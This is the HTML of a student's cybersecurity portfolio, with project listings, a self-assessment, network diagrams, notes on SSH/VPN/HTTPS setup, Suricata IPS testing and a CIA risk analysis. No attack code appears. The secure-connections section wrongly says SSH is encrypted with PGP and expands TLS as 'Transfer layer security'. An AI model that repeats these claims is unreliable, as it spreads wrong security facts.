          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
